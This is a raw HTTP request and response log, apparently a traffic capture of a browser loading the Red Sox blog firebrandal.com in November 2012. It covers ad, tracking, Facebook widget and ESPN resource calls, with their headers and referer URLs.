Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3515913239267445&amp;output=html&amp;h=250&amp;slotname=6323475569&amp;w=300&amp;lmt=1352134830&amp;flash=10.0.45&amp;url=http%3A%2F%2Ffirebrandal.com%2F&amp;dt=1352134837476&amp;bpp=4&amp;shv=r20121023&amp;jsv=r20110914&amp;prev_slotnames=0998046247&amp;correlator=1352134836584&amp;frm=20&amp;adk=3370988103&amp;ga_vid=699239837.1352134837&amp;ga_sid=1352134837&amp;ga_hid=1329589676&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=helvetica&amp;dfs=13&amp;adx=770&amp;ady=794&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=2&amp;dtd=89&amp;xpc=N0GGNbLLEj&amp;p=http%3A//firebrandal.com
HTTP/1.1 200 OK

Content-Type: image/png
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 17994598330340787634
Date: Mon, 05 Nov 2012 03:16:54 GMT
Expires: Tue, 06 Nov 2012 03:16:54 GMT
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 158
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 49426
GET /pagead/images/green-check.png HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3515913239267445&amp;output=html&amp;h=250&amp;slotname=6323475569&amp;w=300&amp;lmt=1352134830&amp;flash=10.0.45&amp;url=http%3A%2F%2Ffirebrandal.com%2F&amp;dt=1352134837476&amp;bpp=4&amp;shv=r20121023&amp;jsv=r20110914&amp;prev_slotnames=0998046247&amp;correlator=1352134836584&amp;frm=20&amp;adk=3370988103&amp;ga_vid=699239837.1352134837&amp;ga_sid=1352134837&amp;ga_hid=1329589676&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=helvetica&amp;dfs=13&amp;adx=770&amp;ady=794&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=2&amp;dtd=89&amp;xpc=N0GGNbLLEj&amp;p=http%3A//firebrandal.com
HTTP/1.1 200 OK

Content-Type: image/png
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 17734124060297529551
Date: Mon, 05 Nov 2012 02:42:33 GMT
Expires: Tue, 06 Nov 2012 02:42:33 GMT
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 394
X-XSS-Protection: 1; mode=block
Age: 51487
Cache-Control: public, max-age=86400
GET /rsrc.php/v2/yH/r/Dpn1SKTH3-z.css HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df180827f0492dbc%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F&amp;node_type=link&amp;width=285&amp;font=false&amp;layout=standard&amp;colorscheme=light&amp;show_faces=true&amp;send=true&amp;extended_social_context=false
HTTP/1.1 200 OK

Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Tue, 25 Sep 2012 01:13:34 GMT
X-Content-Type-Options: nosniff
X-FB-Debug: dMDN7a1IXvLU6yiaN3GjM1lauDCLu8EMov403SVY+c0=
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 499
Cache-Control: public, max-age=28040929
Expires: Thu, 26 Sep 2013 06:09:29 GMT
Date: Mon, 05 Nov 2012 17:00:40 GMT
Connection: keep-alive
GET /rsrc.php/v2/yv/r/LVZxMKo-pXt.css HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df180827f0492dbc%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F&amp;node_type=link&amp;width=285&amp;font=false&amp;layout=standard&amp;colorscheme=light&amp;show_faces=true&amp;send=true&amp;extended_social_context=false
HTTP/1.1 200 OK

Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Fri, 26 Oct 2012 02:23:19 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
X-FB-Debug: HtjMA7CjupM8YgoMnUOH7zmXfoed2Q6ivfLhEVdhV6k=
Content-Length: 2458
Vary: Accept-Encoding
Cache-Control: public, max-age=31003805
Expires: Wed, 30 Oct 2013 13:10:45 GMT
Date: Mon, 05 Nov 2012 17:00:40 GMT
Connection: keep-alive
GET /ud/8?v=1&redir=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%2Fdsy.php%3Fidx%3D3bd2fd5%26ret%3D%7Buserid%7D%26mid%3D0%26override%3D0%26store%3D1%26status%3D1%26from%3Dhttp%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%26swid%3D7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

Host: app.struq.com
GET /ud/8?v=1&amp;redir=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%2Fdsy.php%3Fidx%3D3bd2fd5%26ret%3D%7Buserid%7D%26mid%3D0%26override%3D0%26store%3D1%26status%3D1%26from%3Dhttp%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%26swid%3D7b0c8f7c48610ccc2add5a20ebb44c8a HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
P3P: CP=&quot;NON DSP COR CUR PSAo PSDo OUR BUS COM NAV INT STA PRE&quot;
Date: Mon, 05 Nov 2012 17:00:39 GMT
Connection: close
Content-Length: 43
GET /b?c1=7&c2=8097938&rn=1028298782&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Ffirebrandal.com%252F%26jsref%3D%26rnd%3D1352134839644&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Ffirebrandal.com%2F&cv=2.2&cs=js HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=7&amp;c2=8097938&amp;rn=1028298782&amp;c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Ffirebrandal.com%252F%26jsref%3D%26rnd%3D1352134839644&amp;c3=8097938&amp;c8=ShareThis%20Segmenter&amp;c9=http%3A%2F%2Ffirebrandal.com%2F&amp;cv=2.2&amp;cs=js HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Ffirebrandal.com%2F&amp;jsref=&amp;rnd=1352134839644
Cookie: UID=16d5718-195.159.219.9-1352134835; UIDR=1352134835
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 05 Nov 2012 17:00:40 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /rsrc.php/v2/yf/r/IiB8QpEDgpn.js HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df180827f0492dbc%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F&amp;node_type=link&amp;width=285&amp;font=false&amp;layout=standard&amp;colorscheme=light&amp;show_faces=true&amp;send=true&amp;extended_social_context=false
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 29 Oct 2012 17:08:56 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
X-FB-Debug: 8OGKetH5xlQGSmku2Z/W2vurCpg5XDMMNS8Je0G9JR4=
Content-Length: 19327
Vary: Accept-Encoding
Cache-Control: public, max-age=30936243
Expires: Tue, 29 Oct 2013 18:24:43 GMT
Date: Mon, 05 Nov 2012 17:00:40 GMT
Connection: keep-alive
GET /connect/xd_arbiter.php?version=12 HTTP/1.1

Host: s-static.ak.facebook.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
X-FB-Debug: 3aT4W9Z6SBl9vTyxEG0drnFY+Pn6XxVtUpFrDg5DK6E=
Content-Length: 9716
Vary: Accept-Encoding
Cache-Control: public, max-age=31324836
Expires: Sun, 03 Nov 2013 06:21:16 GMT
Date: Mon, 05 Nov 2012 17:00:40 GMT
Connection: keep-alive
GET /combiner/c?v=201003241632&css=base.201003241632.css,modules.201005171156.css HTTP/1.1

Host: a.espncdn.com
GET /combiner/c?v=201003241632&amp;css=base.201003241632.css,modules.201005171156.css HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://espn.go.com/mlb/sweetspot/localMod?site=firebrand
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modifed: Wed, 19 Sep 2012 15:24:33 GMT
Cache-Expires: Sun, 18 Nov 2012 15:24:33 GMT
Content-Encoding: gzip
Content-Length: 33488
Accept-Ranges: bytes
P3P: CP=&quot;CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE&quot;
Cache-Control: max-age=1117434
Date: Mon, 05 Nov 2012 17:00:40 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /js/getCommentCounts.php?src=wp-2&acct=2de79bffcdcb7dd83c27821260b1eebb&ids=21023|21007|20997|21003|20990|20980|20954|20906|20893|20884|20876|20868|20861|20851|20812|&guids=http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D21023|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D21007|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20997|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D21003|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20990|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20980|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20954|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20906|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20893|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20884|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20876|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20868|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20861|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20851|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20812|&links=http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F02%2Fpoll-biggest-offseason-priority%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F01%2Fred-sox-after-dan-haren%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F01%2Fits-time-for-a-free-agent-frenzy%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F31%2Fbogaerts-tabbed-top-red-sox-prospect%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F31%2Frandom-musings%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F26%2Fa-contract-extension-for-jon-lester%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F25%2Fgetting-their-freak-on%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F24%2Fbobby-v-opens-his-mouth-again%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F23%2Fplaying-the-gm-part-3-the-free-agent-catchers%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F22%2Fpoll-your-thoughts-on-farrells-hiring%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F22%2Fjosh-hamilton-at-dh%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F21%2Fwelcome-back-john-farrell%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F20%2Feasy-there%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F19%2Fpoll-narrowing-the-candidates%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F19%2Fshould-the-red-sox-give-ortiz-a-multi-year-deal%2F|&titles=POLL%253A%2BBiggest%2Boffseason%2Bpriority%253F|Red%2BSox%2Bafter%2BDan%2BHaren%253F|It%2527s%2Btime%2Bfor%2Ba%2Bfree%2Bagent%2Bfrenzy|Bogaerts%2Btabbed%2Btop%2BRed%2BSox%2Bprospect|Random%2Bmusings|A%2BContract%2BExtension%2Bfor%2BJon%2BLester%253F|Getting%2Btheir%2Bfreak%2Bon|Bobby%2BV%2Bopens%2Bhis%2Bmouth.%2BAgain.|Playing%2Bthe%2BGM%2BPart%2B3%253A%2BThe%2BFree%2BAgent%2BCatching%2BOptions|POLL%253A%2BYour%2Bthoughts%2Bon%2BFarrell%2527s%2Bhiring%253F|Josh%2BHamilton%2Bat%2BDH%253F|Welcome%2BBack%2BJohn%2BFarrell|Easy%252C%2Bthere...|POLL%253A%2BNarrowing%2Bthe%2Bcandidates|Should%2Bthe%2BRed%2BSox%2BGive%2BOrtiz%2Ba%2BMulti-Year%2BDeal%253F|&authors=Evan%2BBrunell|Evan%2BBrunell|Evan%2BBrunell|Evan%2BBrunell|Hunter%2BGolden|Chip%2BBuck|Hunter%2BGolden|Evan%2BBrunell|Chip%2BBuck|Evan%2BBrunell|Scott%2BCandage|Brandon%2BStewart|Hunter%2BGolden|Evan%2BBrunell|Chip%2BBuck|&times=2012-11-02%2B12%253A29%253A00|2012-11-01%2B13%253A50%253A11|2012-11-01%2B12%253A00%253A49|2012-10-31%2B18%253A09%253A51|2012-10-31%2B17%253A24%253A30|2012-10-26%2B15%253A53%253A00|2012-10-25%2B12%253A00%253A37|2012-10-24%2B17%253A45%253A01|2012-10-23%2B12%253A00%253A27|2012-10-22%2B12%253A25%253A50|2012-10-22%2B12%253A00%253A31|2012-10-21%2B12%253A00%253A36|2012-10-20%2B19%253A45%253A57|2012-10-19%2B20%253A12%253A34|2012-10-19%2B11%253A30%253A03| HTTP/1.1

Host: intensedebate.com
GET /js/getCommentCounts.php?src=wp-2&amp;acct=2de79bffcdcb7dd83c27821260b1eebb&amp;ids=21023|21007|20997|21003|20990|20980|20954|20906|20893|20884|20876|20868|20861|20851|20812|&amp;guids=http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D21023|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D21007|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20997|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D21003|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20990|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20980|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20954|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20906|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20893|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20884|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20876|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20868|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20861|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20851|http%253A%252F%252Ffirebrandal.com%252F%253Fp%253D20812|&amp;links=http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F02%2Fpoll-biggest-offseason-priority%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F01%2Fred-sox-after-dan-haren%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F01%2Fits-time-for-a-free-agent-frenzy%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F31%2Fbogaerts-tabbed-top-red-sox-prospect%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F31%2Frandom-musings%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F26%2Fa-contract-extension-for-jon-lester%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F25%2Fgetting-their-freak-on%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F24%2Fbobby-v-opens-his-mouth-again%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F23%2Fplaying-the-gm-part-3-the-free-agent-catchers%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F22%2Fpoll-your-thoughts-on-farrells-hiring%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F22%2Fjosh-hamilton-at-dh%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F21%2Fwelcome-back-john-farrell%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F20%2Feasy-there%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F19%2Fpoll-narrowing-the-candidates%2F|http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F19%2Fshould-the-red-sox-give-ortiz-a-multi-year-deal%2F|&amp;titles=POLL%253A%2BBiggest%2Boffseason%2Bpriority%253F|Red%2BSox%2Bafter%2BDan%2BHaren%253F|It%2527s%2Btime%2Bfor%2Ba%2Bfree%2Bagent%2Bfrenzy|Bogaerts%2Btabbed%2Btop%2BRed%2BSox%2Bprospect|Random%2Bmusings|A%2BContract%2BExtension%2Bfor%2BJon%2BLester%253F|Getting%2Btheir%2Bfreak%2Bon|Bobby%2BV%2Bopens%2Bhis%2Bmouth.%2BAgain.|Playing%2Bthe%2BGM%2BPart%2B3%253A%2BThe%2BFree%2BAgent%2BCatching%2BOptions|POLL%253A%2BYour%2Bthoughts%2Bon%2BFarrell%2527s%2Bhiring%253F|Josh%2BHamilton%2Bat%2BDH%253F|Welcome%2BBack%2BJohn%2BFarrell|Easy%252C%2Bthere...|POLL%253A%2BNarrowing%2Bthe%2Bcandidates|Should%2Bthe%2BRed%2BSox%2BGive%2BOrtiz%2Ba%2BMulti-Year%2BDeal%253F|&amp;authors=Evan%2BBrunell|Evan%2BBrunell|Evan%2BBrunell|Evan%2BBrunell|Hunter%2BGolden|Chip%2BBuck|Hunter%2BGolden|Evan%2BBrunell|Chip%2BBuck|Evan%2BBrunell|Scott%2BCandage|Brandon%2BStewart|Hunter%2BGolden|Evan%2BBrunell|Chip%2BBuck|&amp;times=2012-11-02%2B12%253A29%253A00|2012-11-01%2B13%253A50%253A11|2012-11-01%2B12%253A00%253A49|2012-10-31%2B18%253A09%253A51|2012-10-31%2B17%253A24%253A30|2012-10-26%2B15%253A53%253A00|2012-10-25%2B12%253A00%253A37|2012-10-24%2B17%253A45%253A01|2012-10-23%2B12%253A00%253A27|2012-10-22%2B12%253A25%253A50|2012-10-22%2B12%253A00%253A31|2012-10-21%2B12%253A00%253A36|2012-10-20%2B19%253A45%253A57|2012-10-19%2B20%253A12%253A34|2012-10-19%2B11%253A30%253A03| HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=utf-8
Server: nginx
Date: Mon, 05 Nov 2012 17:00:40 GMT
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot;
Content-Encoding: gzip
GET /pagead/drt/s?v=r20120211 HTTP/1.1

Host: googleads.g.doubleclick.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3515913239267445&amp;output=html&amp;h=250&amp;slotname=6323475569&amp;w=300&amp;lmt=1352134830&amp;flash=10.0.45&amp;url=http%3A%2F%2Ffirebrandal.com%2F&amp;dt=1352134837476&amp;bpp=4&amp;shv=r20121023&amp;jsv=r20110914&amp;prev_slotnames=0998046247&amp;correlator=1352134836584&amp;frm=20&amp;adk=3370988103&amp;ga_vid=699239837.1352134837&amp;ga_sid=1352134837&amp;ga_hid=1329589676&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=helvetica&amp;dfs=13&amp;adx=770&amp;ady=794&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=2&amp;dtd=89&amp;xpc=N0GGNbLLEj&amp;p=http%3A//firebrandal.com
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
X-Frame-Options: ALLOWALL
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Mon, 05 Nov 2012 16:38:11 GMT
Server: safe
Content-Length: 141
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=3600
Age: 1349
GET /rsrc.php/v2/y-/r/rYSJ6xqwc9w.js HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df180827f0492dbc%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F&amp;node_type=link&amp;width=285&amp;font=false&amp;layout=standard&amp;colorscheme=light&amp;show_faces=true&amp;send=true&amp;extended_social_context=false
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Wed, 26 Sep 2012 22:32:54 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
X-FB-Debug: TjufmLoiMMbquCl0ypMpPByZ6AQIGbia+LLrL+hF72M=
Content-Length: 4242
Vary: Accept-Encoding
Cache-Control: public, max-age=28588467
Expires: Wed, 02 Oct 2013 14:15:07 GMT
Date: Mon, 05 Nov 2012 17:00:40 GMT
Connection: keep-alive
GET /rsrc.php/v2/yV/r/eFN88ZWYIRm.js HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df180827f0492dbc%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F&amp;node_type=link&amp;width=285&amp;font=false&amp;layout=standard&amp;colorscheme=light&amp;show_faces=true&amp;send=true&amp;extended_social_context=false
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Fri, 26 Oct 2012 01:04:18 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
X-FB-Debug: rf1FnQuyjDT2u4mDWXKaV4B/+oCI2IO3w1/jOM2KChI=
Content-Length: 26585
Vary: Accept-Encoding
Cache-Control: public, max-age=31003599
Expires: Wed, 30 Oct 2013 13:07:19 GMT
Date: Mon, 05 Nov 2012 17:00:40 GMT
Connection: keep-alive
GET /i/partners/sweetspot/logoBoston2.gif HTTP/1.1

Host: a.espncdn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://espn.go.com/mlb/sweetspot/localMod?site=firebrand
HTTP/1.1 200 OK

Content-Type: image/gif
Last-Modified: Tue, 11 May 2010 22:46:05 GMT
Content-Length: 1440
Accept-Ranges: bytes
